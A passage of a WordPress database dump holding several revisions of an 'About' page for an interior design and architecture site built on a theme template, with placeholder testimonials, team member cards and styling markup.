img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:06','2023-05-25 10:18:06','',38,'https://bauhaus.futuremediatrix.com/?p=4752',0,'revision','',0),(4753,2,'2023-05-25 10:18:06','2023-05-25 10:18:06','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:06','2023-05-25 10:18:06','',38,'https://bauhaus.futuremediatrix.com/?p=4753',0,'revision','',0),(4754,2,'2023-05-25 10:18:06','2023-05-25 10:18:06','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" 